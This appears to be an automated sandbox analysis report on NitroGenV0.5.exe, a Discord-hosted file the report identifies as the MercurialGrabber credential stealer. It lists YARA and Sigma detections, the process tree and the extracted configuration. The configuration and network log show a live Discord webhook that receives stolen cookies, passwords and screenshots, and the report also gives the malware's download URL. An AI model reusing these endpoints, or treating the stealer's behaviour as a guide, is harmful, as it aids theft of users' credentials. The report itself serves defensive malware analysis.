
Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL:https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID:517177
Most interesting Screenshot:

Detection

MercurialGrabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 7096 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • NitroGenV0.5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\download\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • NitroGenV0.5.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: MercurialGrabber

{"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\download\NitroGenV0.5.exe | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
C:\Users\user\Desktop\download\NitroGenV0.5.exe | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG |
  • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
  • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
  • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
  • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
  • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG |
  • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
  • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
  • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
  • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
  • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
Process Memory Space: NitroGenV0.5.exe PID: 6784 | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.NitroGenV0.5.exe.8e0000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
17.0.NitroGenV0.5.exe.510000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
6.0.NitroGenV0.5.exe.8e0000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |
6.2.NitroGenV0.5.exe.8e0000.0.unpack | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG |
  • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
  • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
  • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
  • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
  • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
17.2.NitroGenV0.5.exe.510000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security |

                        Sigma Overview

                        System Summary:

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started
Author: James Pemberton / @4A616D6573
Data:
  Command: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  CommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\wget.exe
  NewProcessName: C:\Windows\SysWOW64\wget.exe
  OriginalFileName: C:\Windows\SysWOW64\wget.exe
  ParentCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 6988
  ProcessCommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  ProcessId: 7096

                        Jbx Signature Overview


                        AV Detection:

Found malware configuration
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
Yara detected MercurialGrabber
Source: Yara match, File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, Code function: 6_2_00007FFC08BBB20E CryptUnprotectData, 6_2_00007FFC08BBB20E
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, Code function: 6_2_00007FFC08BBB241 CryptUnprotectData, 6_2_00007FFC08BBB241
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, Code function: 6_2_00007FFC08BBB25E CryptUnprotectData, 6_2_00007FFC08BBB25E
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, Code function: 17_2_00007FFC0893AD7A CryptUnprotectData, 17_2_00007FFC0893AD7A
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, Code function: 17_2_00007FFC0893B25E CryptUnprotectData, 17_2_00007FFC0893B25E

                        Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Source: unknown, HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: ip4.seeip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 448 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 315 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 704 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 307 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 307 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 315 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: ip4.seeip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 448 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 315 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 704 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 307 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 307 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 | Content-Type: application/json | Host: discord.com | Content-Length: 315 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: unknown, HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown, Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown, Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown, Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown, Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown, Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown, Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49745
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, NitroGenV0.5.exe, 00000006.00000002.304401796.000000001BBE5000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.351164827.000000001C910000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp, String found in binary or memory: http://discord.com
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350437000.00000000027D9000.00000004.00000001.sdmp, String found in binary or memory: http://ip-api.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr, String found in binary or memory: http://ip-api.com//json/
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, String found in binary or memory: http://ip-api.com//json/84.17.52.68
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp, String found in binary or memory: http://ip-api.comx
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp, String found in binary or memory: http://ip4.seeip.org
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wget.exe, wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/Ni
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, cmdline.out.1.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe$
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe0
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe9
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe;
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810248877211688/cookies.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810251381211176/passwords.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810260252164166/Capture.jpg
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810339021168680/cookies.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810341642612736/passwords.txt
